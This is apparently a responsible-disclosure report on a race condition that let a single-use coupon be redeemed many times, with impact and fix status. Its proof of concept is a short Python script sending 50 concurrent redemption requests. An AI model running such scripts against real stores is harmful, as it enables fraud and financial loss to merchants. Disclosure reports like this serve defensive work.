Race Condition Private Program 2025-08-01
Race Condition in Coupon Redemption
Severity: High | Status: Resolved
Summary
By sending concurrent requests, a single-use coupon could be applied multiple times before the database lock was acquired.
Proof of Concept
import threading
import requests
def redeem():
requests.post(url, data={"coupon": "SAVE50"})
threads = [threading.Thread(target=redeem) for _ in range(50)]
[t.start() for t in threads]Impact
Financial loss through unlimited coupon redemption.
Responsible Disclosure
This vulnerability was reported responsibly and fixed by the vendor before public disclosure.